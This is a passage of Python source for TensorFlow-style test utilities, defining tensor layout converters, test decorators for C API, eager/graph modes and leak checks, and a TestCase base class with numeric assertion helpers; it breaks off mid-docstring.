def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
def enable_c_shapes(fn):
"""Decorator for enabling C shapes on a test.
Note this enables the C shapes after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
prev_value = ops._USE_C_SHAPES
# Only use C shapes if the C API is already enabled.
ops._USE_C_SHAPES = ops._USE_C_API
try:
fn(*args, **kwargs)
finally:
ops._USE_C_SHAPES = prev_value
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If the C API is already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C API by default
# without breaking these tests.
if ops._USE_C_API: return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then
several times to let objects accumulate. The warmup helps ignore caches which
do not grow as the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
for _ in range(3):
f(self, **kwargs)
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
self.assertEqual(previous_count, new_count)
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj, (
ops.Tensor,
variables.Variable,
tensor_shape.Dimension,
tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects()
if _is_tensorflow_object(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().ones_rank_cache().flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error(
"Object %d of %d" % (i, len(gc.garbage) - previous_garbage))
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s" % (_safe_object_str(obj),))
logging.error(" Referrer types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referrers(obj)]),))
logging.error(" Referent types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referents(obj)]),))
logging.error(" Object attribute names: %s" % (dir(obj),))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (
path_str, type(a), path_str, type(b))
e.args = ((e.args[0] + ' : ' + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
